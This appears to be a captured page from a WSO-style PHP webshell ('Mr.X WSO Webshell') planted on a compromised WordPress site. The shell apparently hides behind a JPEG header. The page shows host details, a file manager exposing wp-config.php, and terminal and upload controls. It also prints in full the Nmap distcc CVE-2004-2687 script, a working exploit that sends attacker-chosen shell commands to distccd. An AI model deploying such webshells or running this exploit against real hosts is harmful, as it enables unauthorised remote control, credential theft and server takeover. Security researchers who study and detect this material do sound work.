��JFIF��www.stoptube.com - WSOX ENC

Attention:
Uname:
Php:
Hdd:
Cwd:

Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
5.3.29 Safe mode: OFF Datetime: 2026-04-09 07:03:08
1999.30 GB Free: 76.18 GB (3%)
/home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text

Server IP:
127.0.0.54
Client IP:
216.73.216.53

[ Files ]	[ Logout ]

File manager

	Name	Size	Modify	Permissions	Actions
	[ . ]	dir	2020-10-29 21:25:34	drwxr-xr-x	Rename Touch
	[ .. ]	dir	2026-04-09 07:01:37	drwxr-xr-x	Rename Touch
	[ cgi-bin ]	dir	2012-04-08 21:15:31	drwxr-xr-x	Rename Touch
	[ public_html ]	dir	2023-11-10 01:29:28	drwxr-xr-x	Rename Touch
	[ stats ]	dir	2012-05-18 05:35:08	drwxr-xr-x	Rename Touch
	[ wp-admin ]	dir	2018-10-17 02:02:36	drwxr-xr-x	Rename Touch
	[ wp-content ]	dir	2026-04-09 07:02:17	drwxrwxr-x	Rename Touch
	[ wp-includes ]	dir	2018-10-17 02:02:35	drwxrwxr-x	Rename Touch
	[ wpbackup-mojo ]	dir	2013-09-23 12:20:27	drwxr-xr-x	Rename Touch
	120x240_2.gif	13.45 KB	2008-06-28 03:13:23	-rw-r--r--	Rename Touch Edit Download
	120x240_4.gif	11.19 KB	2008-06-28 03:15:01	-rw-r--r--	Rename Touch Edit Download
	google33e705b4a02b516c.html	53 B	2018-10-09 07:59:06	-rw-r--r--	Rename Touch Edit Download
	google54c2bf32c9bf2083.html	7 B	2009-05-30 01:17:01	-rw-r--r--	Rename Touch Edit Download
	grepsearch.php	910 B	2009-05-31 03:50:51	-rw-r--r--	Rename Touch Edit Download
	index.php	418 B	2018-10-17 02:00:34	-rw-r--r--	Rename Touch Edit Download
	license.txt	19.47 KB	2018-10-17 02:00:34	-rw-r--r--	Rename Touch Edit Download
	readme.html	7.24 KB	2020-10-29 21:25:34	-rw-r--r--	Rename Touch Edit Download
	robots.txt	29 B	2014-04-01 00:38:43	-rw-r--r--	Rename Touch Edit Download
	scan_files.php	3.34 KB	2009-06-03 20:33:08	-rw-r--r--	Rename Touch Edit Download
	wp-activate.php	6.72 KB	2018-12-13 02:57:59	-rw-r--r--	Rename Touch Edit Download
	wp-atom.php	226 B	2010-12-09 18:02:54	-rw-r--r--	Rename Touch Edit Download
	wp-blog-header.php	364 B	2018-10-17 02:02:31	-rw-r--r--	Rename Touch Edit Download
	wp-comments-post.php	1.84 KB	2018-10-17 02:02:31	-rw-r--r--	Rename Touch Edit Download
	wp-commentsrss2.php	244 B	2010-12-09 18:02:54	-rw-r--r--	Rename Touch Edit Download
	wp-config-sample.php	2.79 KB	2018-10-17 02:02:31	-rw-r--r--	Rename Touch Edit Download
	wp-config.php	1.47 KB	2018-10-04 12:51:18	-rw-rw-r--	Rename Touch Edit Download
	wp-config.php_backup_ticket_524664	1.30 KB	2018-10-03 15:00:12	-rw-r--r--	Rename Touch Edit Download
	wp-cron.php	3.58 KB	2018-10-17 02:02:31	-rw-r--r--	Rename Touch Edit Download
	wp-feed.php	246 B	2010-12-09 18:02:54	-rw-r--r--	Rename Touch Edit Download
	wp-links-opml.php	2.37 KB	2018-10-17 02:02:34	-rw-r--r--	Rename Touch Edit Download
	wp-load.php	3.23 KB	2018-10-17 02:02:34	-rw-r--r--	Rename Touch Edit Download
	wp-login.php	36.92 KB	2018-12-13 02:57:59	-rw-r--r--	Rename Touch Edit Download
	wp-mail.php	7.86 KB	2018-10-17 02:02:34	-rw-r--r--	Rename Touch Edit Download
	wp-pass.php	494 B	2010-12-09 18:02:54	-rw-r--r--	Rename Touch Edit Download
	wp-rdf.php	224 B	2010-12-09 18:02:54	-rw-r--r--	Rename Touch Edit Download
	wp-register.php	334 B	2010-12-09 18:02:54	-rw-r--r--	Rename Touch Edit Download
	wp-rss.php	224 B	2010-12-09 18:02:54	-rw-r--r--	Rename Touch Edit Download
	wp-rss2.php	226 B	2010-12-09 18:02:54	-rw-r--r--	Rename Touch Edit Download
	wp-settings.php	15.87 KB	2018-10-17 02:02:34	-rw-r--r--	Rename Touch Edit Download
	wp-signup.php	29.39 KB	2018-10-17 02:02:34	-rw-r--r--	Rename Touch Edit Download
	wp-trackback.php	4.51 KB	2018-10-17 02:02:34	-rw-r--r--	Rename Touch Edit Download
	wpupdate.sh	12.75 KB	2013-09-22 17:09:27	-rw-r--r--	Rename Touch Edit Download
	xmlrpc.php	2.99 KB	2018-10-17 02:02:34	----------	Rename Touch Edit Download

Change dir:	Read file:
Make dir: (Not writable)	Make file: (Not writable)
Terminal:	Upload file: (Not writable)

HEX

HEX

Server: Apache

System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64

User: camjab_ssh (1000)

PHP: 5.3.29

Disabled: NONE

Upload Files

File: //usr/share/nmap/scripts/distcc-cve2004-2687.nse

local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"

description = [[
Detects and exploits a remote code execution vulnerability in the distributed
compiler daemon distcc. The vulnerability was disclosed in 2002, but is still
present in modern implementation due to poor configuration of the service.
]]

---
-- @usage
-- nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
--
-- @output
-- PORT     STATE SERVICE
-- 3632/tcp open  distccd
-- | distcc-test: 
-- |   VULNERABLE:
-- |   distcc Daemon Command Execution
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2004-2687
-- |     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
-- |     Description:
-- |       Allows executing of arbitrary commands on systems running distccd 3.1 and
-- |       earlier. The vulnerability is the consequence of weak service configuration.
-- |       
-- |     Disclosure date: 2002-02-01
-- |     Extra information:
-- |       
-- |     uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
-- |   
-- |     References:
-- |       http://distcc.googlecode.com/svn/trunk/doc/web/security.html
-- |       http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
-- |       http://http://www.osvdb.org/13378
-- |_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
--
-- @args cmd the command to run at the remote server
--

author = "Patrik Karlsson"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit", "intrusive", "vuln"}


portrule = shortport.port_or_service(3632, "distcc")

local arg_cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "id"

local function fail(err) return ("\n  ERROR: %s"):format(err or "") end

action = function(host, port)

	local distcc_vuln = {
		title = "distcc Daemon Command Execution",
		IDS = {CVE = 'CVE-2004-2687'},
		risk_factor = "High",
		scores = {
			CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
		},
		description = [[
Allows executing of arbitrary commands on systems running distccd 3.1 and
earlier. The vulnerability is the consequence of weak service configuration.
]],
		references = {
			'http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687',
			'http://http://www.osvdb.org/13378',
			'http://distcc.googlecode.com/svn/trunk/doc/web/security.html',
    	},
		dates = { disclosure = {year = '2002', month = '02', day = '01'}, },
		exploit_results = {},
	}

	local report = vulns.Report:new(SCRIPT_NAME, host, port)
	distcc_vuln.state = vulns.STATE.NOT_VULN

	local socket = nmap.new_socket()
	if ( not(socket:connect(host, port)) ) then
		return fail("Failed to connect to distcc server")
	end
	
	local cmds = {
		"DIST00000001",
		("ARGC00000008ARGV00000002shARGV00000002-cARGV%08.8xsh -c " .. 
		 "'(%s)'ARGV00000001#ARGV00000002-cARGV00000006main.cARGV00000002" ..
		 "-oARGV00000006main.o"):format(10 + #arg_cmd, arg_cmd),
		"DOTI00000001A\n",
	}
	
	for _, cmd in ipairs(cmds) do
		if ( not(socket:send(cmd)) ) then
			return fail("Failed to send data to distcc server")
		end
	end
	
	local status, data = socket:receive_buf("DOTO00000000", false)

	if ( status ) then
		local output = data:match("SOUT%w%w%w%w%w%w%w%w(.*)")
		if (output and #output > 0) then
			distcc_vuln.extra_info = stdnse.format_output(true, output)
			distcc_vuln.state = vulns.STATE.EXPLOIT
			return report:make_output(distcc_vuln)
		end
	end
end